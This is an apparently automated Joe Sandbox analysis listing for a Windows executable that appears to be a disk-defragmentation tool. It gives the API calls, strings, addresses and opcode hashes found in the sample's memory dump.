                                                                                                                                                                                                                                                                                    • Instruction ID: 080451bb04fed4ed38a755b401fe0e9ad2b372c89e4fc55ac88ae6bf0dae2c00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84115EB5104745AFD724CF64C848B9B77E8FB84304F10893EE88A87690E7B9E588CB95
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 0046CF84
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0046CFAB
                                                                                                                                                                                                                                                                                    • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0046CFCB
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0046CFDA
                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0046CFF1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ObjectSelect$Release
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3581861777-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                    • Instruction ID: daceeca4effa55fca9f5214fa6f3dce8251d9e38b51f783a69048b93fac7a53b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 751115B5200601AFC314DFA9C9C8C27B7EAFF88600700C62DB94987601DB35FC45CB64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$Parent$InflateInvalidateWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3567486610-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                    • Instruction ID: 59621ce25ffcf61443309c609473fb22192222cc28d28fc8a60ac4e9d60af83f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BF044B6100304BFC210EB74DC8AD6B77ACFBC8700F008A1DB58A87191EA74F540CB65
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00497DC0), ref: 0040122D
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00497DC0), ref: 00401243
                                                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(00000000), ref: 0040124F
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401263
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00497DC0), ref: 0040126A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$GdiplusShutdown
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3506214061-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7eae0b955cfe46139e040fd821d45967254a2c9d3517b53231cd44731b97ba61
                                                                                                                                                                                                                                                                                    • Instruction ID: 085117cba8507ed758f2e3bd9e34728127d7a1f2de7180c4966a7f221b9c7101
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7eae0b955cfe46139e040fd821d45967254a2c9d3517b53231cd44731b97ba61
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E0863166C2145ACA007BB6BC49B663F64AFC0B1471941BFE008B31E0C57855448FFD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentObject.GDI32(?,00000006), ref: 0040496A
                                                                                                                                                                                                                                                                                    • GetCurrentObject.GDI32(?,00000006), ref: 0040497C
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040498F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Object$Current
                                                                                                                                                                                                                                                                                    • String ID: Pm)u
                                                                                                                                                                                                                                                                                    • API String ID: 794720297-3463418517
                                                                                                                                                                                                                                                                                    • Opcode ID: 1c15ff392ba4ccc552d1cc8ccfec82d3bdfd914156950518807fb3f3c9dd7546
                                                                                                                                                                                                                                                                                    • Instruction ID: 20de2fea0a77186f2b8b7da5da4347ef9f16a332326cf680508f5ccd498c1f2d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c15ff392ba4ccc552d1cc8ccfec82d3bdfd914156950518807fb3f3c9dd7546
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2B12AB16083019FC714DF28C984A6BB7E5BBC8710F148A2EF69997395D734E805CB9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 004679CE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004679E4
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DeleteObject
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 4188969710-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: bb304f05f30cbdd69a183ac06b326108be92b73323326cf8809e001b9e6bd276
                                                                                                                                                                                                                                                                                    • Instruction ID: 57d6ba00d9628d7bc6127d5ab1f70525051783d1f21ea283ef51d44a992bc025
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb304f05f30cbdd69a183ac06b326108be92b73323326cf8809e001b9e6bd276
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92612C70A08316DFD714EF64C884A1AB7A5BF84318F1088AEE955A7351E734EC45CFAB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: Back$GUBar::CDrawObjectFactory::CreateRectTextDraw$Text
                                                                                                                                                                                                                                                                                    • API String ID: 0-2901586747
                                                                                                                                                                                                                                                                                    • Opcode ID: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                    • Instruction ID: 94c29d93b79a1152409cb834b352fc504edd985983e521adcc95b20eb26bf893
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6514F75604315EFC710DF25C880A6BB7E8EB88754F104A2EF84997380E779ED458B9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,75BFAF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA20: SHGetFileInfoW.SHELL32(?,00000000,000002B4,000002B4,00004001), ref: 0041AA4D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001214,00000004,00000000), ref: 00402B9F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileInfoMessageSend$DriveDrivesLogicalType
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 2359154852-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                    • Instruction ID: 82d795afe4258906e57f36ef34ec2eb48dfa52df3f098ca2abc9abbdf1da0df4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3170ff8149e9c2b6ee3bcf2834819091aa34d1669217c11efa96fe0deec9a490
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D541D6717443406BE324DF61DC86FAA73A4AB84B04F00492DF249AB2C1DBB4A545CB9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004619BD
                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,Disk Defrag,00040010), ref: 004619FE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLastMessage
                                                                                                                                                                                                                                                                                    • String ID: %c:\$Disk Defrag
                                                                                                                                                                                                                                                                                    • API String ID: 463093485-3222931339
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,?), ref: 00410C49
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%HOMEDRIVE%,?,0000000C), ref: 00410C8F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandInformationStringsVolume
                                                                                                                                                                                                                                                                                    • String ID: %HOMEDRIVE%$NTFS
                                                                                                                                                                                                                                                                                    • API String ID: 1751349637-3402063299
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,0000000C,0000000C,?,?,?,?,?,?,?,004619AE), ref: 004629EC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InformationVolume
                                                                                                                                                                                                                                                                                    • String ID: FAT$FAT16$FAT32
                                                                                                                                                                                                                                                                                    • API String ID: 2039140958-3969911809
                                                                                                                                                                                                                                                                                    • Opcode ID: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
                                                                                                                                                                                                                                                                                    • Instruction ID: 45468f2d8361374e2203d088d382e4daaec04f6418c830f46f854969d88bf3c3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16112175A18300AED754EF789D92B6B77E4AF88704F84492EF848C3251F678D604CB9B
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,00000000), ref: 004226F8
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 0042271F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Timer$Kill
                                                                                                                                                                                                                                                                                    • String ID: 3401028$3401029
                                                                                                                                                                                                                                                                                    • API String ID: 3307318486-3858196228
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                    • Instruction ID: 02bff0ae68159748c7f69b0dc43338cfbe1eaa20307d0c92b455edf88c414399
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 481184B574470097C3209B64DC81FEAB3A56F88750F20871FF26FA72D1C7A4B8419788
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetRectEmpty.USER32(0000000C), ref: 0040DE94
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EmptyRect
                                                                                                                                                                                                                                                                                    • String ID: Button$CDoubleDraw$Default
                                                                                                                                                                                                                                                                                    • API String ID: 2270935405-580154339
                                                                                                                                                                                                                                                                                    • Opcode ID: 46be97038f1fb4e2fb67b84b2aff2fccaa5b1abb12b68c42fd26aa523238d7ea
                                                                                                                                                                                                                                                                                    • Instruction ID: ef19d2a367d3f1db560aaf5cf05e81b0258e296f30c95c9ac20d7302b86fa88f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46be97038f1fb4e2fb67b84b2aff2fccaa5b1abb12b68c42fd26aa523238d7ea
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C611ABB1A447119BD3109F56CC42B97B6E8EB48B24F108A2FF519E72C1D7BC680447DD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(?), ref: 0046C51A
                                                                                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0046C576
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0046C58F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_854113748.jbxd
Similarity
• API ID: Window$Defer$BeginRedraw
• String ID: Button_Check
• API String ID: 2284443614-1860365581
• Opcode ID: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
• Instruction ID: 5655fd99f899ac16fa463449df691d44eb2f3411b94b0263f5d23efcf872a4b1
• Opcode Fuzzy Hash: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
• Instruction Fuzzy Hash: 5F21EDB4600702AFC310CF29C984A16FBE4BB88310F148A5EE59997261E734F945CB96
APIs
• mciSendCommandW.WINMM ref: 0041E210
• mciGetErrorStringW.WINMM(00000000,?,00000080), ref: 0041E23D
• mciSendCommandW.WINMM(00000001,00000806,00010000,?), ref: 0041E26C
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_854113748.jbxd
Similarity
• API ID: CommandSend$ErrorString
• String ID: %s/n
• API String ID: 1543859921-1476993579
• Opcode ID: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
• Instruction ID: bb7bdc0f92cc2694eaa6ee34f7bcc843a23ee59e2d49304dadf9c875fa4d5d80
• Opcode Fuzzy Hash: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
• Instruction Fuzzy Hash: 04118671504301BBD360EB54DC46FEFB7E8AF88714F00492EF589D7290E67495588796
APIs
  • Part of subcall function 00401190: EnterCriticalSection.KERNEL32(00497DC0,00000000,?,?,?,?,?,004014CD,?,?), ref: 00401199
  • Part of subcall function 00401190: GdiplusStartup.GDIPLUS(00497DBC,?,?,?,?,?,?,?,004014CD,?,?), ref: 004011CD
  • Part of subcall function 00401190: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,004014CD,?,?), ref: 004011DD
• GdipCreateBitmapFromFile.GDIPLUS ref: 004014FA
• GdipDisposeImage.GDIPLUS(?), ref: 0040152C
• GdipDisposeImage.GDIPLUS(00000000), ref: 00401559
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_854113748.jbxd
Similarity
• API ID: Gdip$CriticalDisposeImageSection$BitmapCreateEnterFileFromGdiplusLeaveStartup
• String ID: >=
• API String ID: 1500692541-3263226258
• Opcode ID: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
• Instruction ID: 2a3b4bfc414dc10881e7eec236f3a1e04021e9235cedc72d475739dca07e05aa
• Opcode Fuzzy Hash: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
• Instruction Fuzzy Hash: 2C01A5725043119BC710EF18D885AEFB7E8BFC4358F04892EF588AB260D738DA09C796
APIs
• GetModuleHandleW.KERNEL32(?,00415319,?,?,113262B6,?,?,00000000,113262B6,?,113262B6,?,00000000,00000000), ref: 00415253
• LoadLibraryW.KERNEL32(?), ref: 00415264
• GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 0041527E
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_GetImageInfo
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-158344479
                                                                                                                                                                                                                                                                                    • Opcode ID: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                    • Instruction ID: f55cdba9153e0e1c980a4fac1fe1aa85c7dcce68075fab81bff91a96374b76ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0B275A00B41DFDB208FB8D848B82B7E4AB58715F00C82EA5AEC3611D738E480CF14
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415489,?,?,113262B6,?,?,00000000,004070E8,?,113262B6,?,00000000,00000000), ref: 004153D0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 004153E1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 004153FB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ImageList_GetImageCount, xrefs: 004153F5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_GetImageCount
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-4246500564
                                                                                                                                                                                                                                                                                    • Opcode ID: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                    • Instruction ID: 982047e8d717f41167e3cd9be7dffe01ffe3abe97b222393831f80d9b05f459f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08F07475601B45CFD7208F68D948A87B7E4FB58715B40892EE5AEC3A51D778E880CB08
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00403E46,?,?,113262B6), ref: 00403DA0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00403DB1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_AddMasked), ref: 00403DCB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_AddMasked
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-822293376
                                                                                                                                                                                                                                                                                    • Opcode ID: 2cef274448d629194f45eaed383d3ce2d55fe80bf2e66e2031492a90ae4c9555
                                                                                                                                                                                                                                                                                    • Instruction ID: f86be7005d8cc87f643f266e3e9cbb46ccc5d3431ffdeeb8f838823e3b4bd8b2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cef274448d629194f45eaed383d3ce2d55fe80bf2e66e2031492a90ae4c9555
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F06275611B019FDB209F68D948B06BBF8AF18B15B40883DA5AAD3A55D638E540CB04
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C87E
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042C88F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C8C7
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042C8D2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 166717107-0
